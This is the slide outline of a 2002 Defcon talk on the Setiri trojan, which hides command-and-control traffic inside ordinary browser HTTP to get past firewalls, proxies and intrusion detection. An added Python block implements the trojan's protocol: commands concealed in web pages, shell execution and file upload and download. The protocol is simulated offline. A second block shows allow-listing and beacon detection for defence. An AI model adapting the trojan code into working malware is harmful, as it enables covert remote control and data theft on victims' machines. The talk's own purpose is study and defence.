Setiri:
Advances in Trojan Technology
Roelof Temmingh & Haroon Meer
Defcon 10
Las Vegas
2002
Schedule
Introduction
Why Trojans?
Brief History of Trojans & Covert Channels
The Hybrid model
Setiri: Advances in Trojan Technology
Demonstration
Taking it further
Possible fixes
Introduction
SensePost
The speakers
Objective of the presentation
Why Trojans?
Profile of Trojan users
Real criminals... don't write buffer overflows
The weirdness of the industry
Examples
Brief History of Trojans & Covert Tunnels
Trojans: from Quick Thinking Greeks ... to Quick Thinking Geeks
Tunnels: Covert Channels
Trojans (Valid IP – No Filters)
"get real.."
Trojans (Valid IP – Stateless Filter)
Dial Home Trojans
Random Ports / Open Ports / High Ports [cDc]
ACK Tunneling [Arne Vidstrom]
Trojans (Stateful Filters)
Back Orifice 2000 – http://bo2k.sourceforge.net
Gbot
Rattler
Tunnels & Covert Channels
1985 – TCSEC definition of "Covert Channels"
1996 – Phrack Magazine – LOKI
1998 – RWWWShell – THC
1999 – HTTPTUNNEL – GNU
2000 – FireThru – Firethru
Conventional Trojans & how they fail

Defense in place                        Trojan model it defeats
Stateful firewall & IDS                 Direct model
                                        Direct model with network tricks (ICMP tunneling, ACK tunneling)
Properly configured stateful firewall   IRC agents (+)
Authentication proxy                    HTTP tunnel (++)
Personal firewall & advanced proxy      HTTP tunnel with authentication (+++)
Hybrid model: "GatSlag"
Combination between covert tunnel and Trojan
Defense mechanisms today:
Packet filters (stateful) / NAT
Authentication proxies
Intrusion detection systems
Personal firewalls
Content/protocol checking
Biometrics / token pads / one-time passwords
Encryption
A typical network
How GatSlag worked
Reverse connection
HTTP covert tunnel
Microsoft Internet Explorer as transport
Controls IE via OLE
Encapsulated in IE, not in HTTP: the Trojan never speaks HTTP itself, the browser does
Receive commands in the title of a web page
Receive encoded data as plain text in the body of a web page
Send data with POST requests
Send alive signals with GET requests
Why GatSlag worked
Integration of client with MS Proxy: NTLM authentication
SSL capable
Registry changes
Personal firewalls: just another browser
Platform independent: IE on every desktop
Specify controller via a public web page – the MASTER site
Problems with GatSlag
The Controller's IP can be obtained!
Handling of multiple instances
GUI support
Controller needed to be online
Batch commands
Command history
Multiple controllers
Upload facility not efficient
Platform support
Stability
Session level tunneling
Setiri:
Advances in Trojan Technology
Design notes:
Web site contains instructions
CGIs to create new instructions
Controller's interface:
– EXEC (DOS commands, various)
– TX (File upload)
– RX (File download)
Directory structure – one per instance
Trojan "surfs" to the web site – just as a normal user would
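The page-as-channel protocol from the "How GatSlag worked" slide, carrying the three Setiri verbs from the design notes above, as an added example in pure Python. This is not the authors' GatSlag or Setiri code: the real tools drove Internet Explorer through OLE and let the browser do the HTTP; here the "browser" is a dict of pages so the whole exchange runs offline. The verb names EXEC, TX and RX, the command-in-title and base64-data-in-body layout, the result POST and the alive GET are from the slides; the path scheme (`/<instance>/<seq>.html`, `/<instance>/alive`, `/<instance>/result`), the form field names and the in-memory stand-in for the victim's disk are assumptions for illustration.

```python
import base64
import subprocess
from html.parser import HTMLParser
from urllib.parse import urlencode, parse_qs

# ---- controller side ------------------------------------------------------
def build_instruction_page(command, payload=b""):
    """Command in <title>, data as plain base64 text in the body.
    To a content filter this is just another small web page."""
    body = base64.b64encode(payload).decode("ascii")
    return ("<html><head><title>%s</title></head>"
            "<body><p>%s</p></body></html>" % (command, body))

def decode_result_post(post_body):
    """Unwrap a results POST into (instance, seq, result bytes)."""
    q = parse_qs(post_body)
    return q["id"][0], int(q["seq"][0]), base64.b64decode(q["r"][0])

# ---- trojan side ----------------------------------------------------------
class _PageReader(HTMLParser):
    """Pull the <title> text and the body text out of a fetched page."""
    def __init__(self):
        super().__init__()
        self.title, self.body, self._where = "", [], None

    def handle_starttag(self, tag, attrs):
        if tag in ("title", "body"):
            self._where = tag

    def handle_endtag(self, tag):
        if tag in ("title", "body"):
            self._where = None

    def handle_data(self, data):
        if self._where == "title":
            self.title += data
        elif self._where == "body":
            self.body.append(data)

def parse_instruction_page(html):
    """Return (command, payload) hidden in an ordinary-looking page."""
    r = _PageReader()
    r.feed(html)
    text = "".join(r.body).strip()
    return r.title.strip(), (base64.b64decode(text) if text else b"")

def run_instruction(command, data, fs):
    """The three Setiri verbs. `fs` is a dict standing in for the victim's
    disk (assumed, so TX/RX stay in memory); EXEC really runs the string."""
    verb, _, arg = command.partition(" ")
    if verb == "EXEC":
        p = subprocess.run(arg, shell=True, capture_output=True)
        return p.stdout + p.stderr
    if verb == "TX":            # controller -> victim (file upload)
        fs[arg] = data
        return b"OK " + str(len(data)).encode()
    if verb == "RX":            # victim -> controller (file download)
        return fs.get(arg, b"")
    return b"ERR unknown verb"

def encode_result_post(instance, seq, result):
    """Results leave as an ordinary form POST; field names are assumed."""
    return urlencode({"id": instance, "seq": seq,
                      "r": base64.b64encode(result).decode("ascii")})

def alive_get_path(instance):
    """Keep-alive is a plain GET of a fixed (assumed) path."""
    return "/%s/alive" % instance

# ---- one simulated session, no network ------------------------------------
def simulate_session(instance, instructions, fs):
    """`instructions` is the list of (command, payload) the controller has
    published. Returns the wire log a proxy would see and the decoded results."""
    site = {"/%s/%d.html" % (instance, i): build_instruction_page(c, p)
            for i, (c, p) in enumerate(instructions)}
    wire, results = [("GET", alive_get_path(instance), "")], []
    for seq in range(len(instructions)):
        path = "/%s/%d.html" % (instance, seq)
        wire.append(("GET", path, ""))                      # "surf" to the page
        cmd, data = parse_instruction_page(site[path])
        body = encode_result_post(instance, seq, run_instruction(cmd, data, fs))
        wire.append(("POST", "/%s/result" % instance, body))
        results.append(decode_result_post(body)[2])
    return wire, results
```

On the wire the session is one GET of the alive path followed by GET/POST pairs, each fetch of a page that renders as a title and a paragraph of text; nothing in the methods, ports or content types differs from a user filling in a web form, which is the point the next slides make.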
Setiri: Advances in Trojan Technology II
Anonymity
Problems with normal proxies: already using a proxy; proxy logs
"Cleaners" provide anonymity: "in-browser proxy" – Anonymizer
Trojan -> Cleaner: SSL
Cleaner -> Controller: SSL
Challenges: browser history, temporary files
Why defenses fail
Firewalls (stateful/NAT): configured to allow the user or the proxy out
Content level & IDS: looks like valid HTTP requests & replies; files downloaded as text in web pages; no data or ports to lock on to; SSL provides encryption
Personal firewalls: IE is a valid application, configured to allow browsing
Authentication proxies: the user surfs the web
Demonstration
Solving the dilemma
Delivery
White listing
User education
AV, personal firewalls
Should you allow everyone to surf the ‘net?
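Two of the fixes above, as an added example that is not part of the original talk: a destination allow-list ("white listing") applied to proxy log records, and the check a detection engineer would add for the alive signals the earlier slide describes, which are GETs to the same host at a fixed interval. The log lines are constructed, the log format (ISO time, client, method, URL, status) is assumed, and the host names are placeholders. Because the Trojan-to-cleaner leg runs over SSL, the proxy only sees CONNECT host:443 with no path, so the regularity check groups on (client, host) rather than on URL.

```python
import re
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed proxy log. The CONNECT lines from 10.1.1.7 are the Trojan's
# keep-alives through the cleaner site, one a minute; the rest is browsing.
SAMPLE_LOG = """\
2002-08-02T09:00:00 10.1.1.7 GET http://www.cnn.com/ 200
2002-08-02T09:00:04 10.1.1.7 GET http://www.cnn.com/images/logo.gif 200
2002-08-02T09:00:30 10.1.1.7 CONNECT cleaner.example:443 200
2002-08-02T09:00:41 10.1.1.7 GET http://intranet.corp.example/news 200
2002-08-02T09:01:30 10.1.1.7 CONNECT cleaner.example:443 200
2002-08-02T09:02:30 10.1.1.7 CONNECT cleaner.example:443 200
2002-08-02T09:02:55 10.1.1.7 GET http://www.cnn.com/world/ 200
2002-08-02T09:03:30 10.1.1.7 CONNECT cleaner.example:443 200
2002-08-02T09:04:30 10.1.1.7 CONNECT cleaner.example:443 200
2002-08-02T09:04:37 10.1.1.9 GET http://www.cnn.com/ 200
2002-08-02T09:05:30 10.1.1.7 CONNECT cleaner.example:443 200
"""

# Assumed allow-list: the only destinations this site lets users reach.
ALLOW = {"www.cnn.com", "intranet.corp.example"}

LINE = re.compile(r"(\S+) (\S+) (\S+) (\S+) (\d+)")

def parse_log(text):
    """Parse the assumed log format; host comes from the URL or CONNECT target."""
    recs = []
    for line in text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        ts, client, method, url, status = m.groups()
        host = url.split("://", 1)[-1].split("/", 1)[0].split(":")[0]
        recs.append({"t": datetime.fromisoformat(ts), "client": client,
                     "method": method, "host": host, "url": url,
                     "status": int(status)})
    return recs

def whitelist_filter(recs, allow):
    """Destination white listing: only hosts on the list get out.
    Returns (allowed, denied) record lists."""
    allowed = [r for r in recs if r["host"] in allow]
    denied = [r for r in recs if r["host"] not in allow]
    return allowed, denied

def regular_callers(recs, min_hits=5, max_cv=0.2):
    """Flag (client, host) pairs contacted at near-constant intervals.
    cv is the coefficient of variation of the gaps; a fixed-interval
    alive signal gives cv close to 0, human browsing does not."""
    by_pair = defaultdict(list)
    for r in recs:
        by_pair[(r["client"], r["host"])].append(r["t"])
    flagged = []
    for (client, host), times in by_pair.items():
        if len(times) < min_hits:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        avg = mean(gaps)
        cv = pstdev(gaps) / avg if avg else 0.0
        if cv <= max_cv:
            flagged.append((client, host, round(avg), round(cv, 3)))
    return flagged
```

The allow-list is the control that actually closes the channel: the cleaner host is simply not reachable, whatever the traffic looks like. The regularity check is only a heuristic for sites that cannot restrict browsing; a Trojan that jitters its alive signals, or reuses a host users already visit, will not trip it.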
Conclusion
Awareness
Our motivation